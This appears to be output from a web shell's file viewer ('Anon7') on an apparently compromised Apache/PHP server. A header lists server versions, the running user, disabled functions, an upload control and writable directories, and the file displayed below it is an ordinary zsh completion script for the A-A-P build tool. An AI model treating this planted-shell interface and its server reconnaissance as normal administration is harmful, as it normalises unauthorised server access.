KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17
System : Linux localhost 2.6.18-419.el5 #1 SMP Fri Feb 24 22:47:42 UTC 2017 x86_64
User : nobody ( 99)
PHP Version : 5.2.17
Disable Function : NONE
Directory :  /usr/share/zsh/4.2.6/functions/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/share/zsh/4.2.6/functions/_aap
#compdef aap

# A-A-P recipe executive version 1.001; released 2003 Jul 05 20:44:44 GMT

local curcontext="$curcontext" state line ret=1
typeset -A opt_args

_arguments \
  '(- *)'{-V,--version}'[print version information and exit]' \
  '(- *)'{-h,--help}'[print help information and exit]' \
  '(-v --verbose)'{-v,--verbose}'[print more information]' \
  '(-s --silent)'{-s,--silent}'[print less information]' \
  '(-d --debug)'{-d,--debug=}'[debug the specified items]:flags:' \
  '--profile=[profile A-A-P execution and write results in specified file]:output file:_files' \
  '(-n --nobuild)'{-n,--nobuild}'[print the build commands but do not execute them]' \
  '--changed=[consider specified file changed]:changed file:_files' \
  '(-t --touch)'{-t,--touch}'[update target signatures, do not build]' \
  '(-F --force)'{-F,--force}'[force rebuilding]' \
  '(-C --contents)'{-C,--contents}'[only build when file contents changed]' \
  \*{-c,--command=}'[execute a command after reading the recipe]:aap command:' \
  '(-k --continue)'{-k,--continue}'[continue building after an error]' \
  '(-S --stop)'{-S,--stop}'[stop building at first error (default)]' \
  '(-R --fetch-recipe)'{-R,--fetch-recipe}'[fetch recipe file and child recipes]' \
  '(-N --nofetch-recipe)'{-N,--nofetch-recipe}'[do not fetch recipes for "fetch" target]' \
  '(-a --nocache)'{-a,--nocache}"[always download files, don't use the cache]" \
  '(-l --local)'{-l,--local}'[do not recurse into subdirectories]' \
  '(-j --jobs)'{-j,--jobs=}'[maximum number of parallel jobs]:number of jobs:' \
  '(-u --search-up --up)'{-u,--search-up,--up}'[search directory tree upwards for main.aap recipe]' \
  \*{-I,--include=}'[directory to search for included recipes]:include directory:_files -/' \
  '(-f --recipe)'{-f,--recipe=}'[recipe file to be executed]:recipe file:_files -g \*.aap\(-.\)' \
  '--install=[install specified package]:package name:' \
  '--[end of options, targets and assignments follow]' \
  '*:aap target:->target' && ret=0

if [[ "$state" = target ]]; then
  local aap_targets aap_recipe expl

  aap_recipe=${(v)opt_args[(I)(-f|--recipe)]:-main.aap}
  if [[ -f $aap_recipe ]] && _tags targets; then
    aap_targets=( "${(@)${(@)${(@f)$( _call_program targets "$words[1]" -f $aap_recipe comment 2>/dev/null )}#target }%%: *}" comment )
    _wanted targets expl target compadd -a aap_targets && ret=0
  fi
fi

return ret

Anon7 - 2021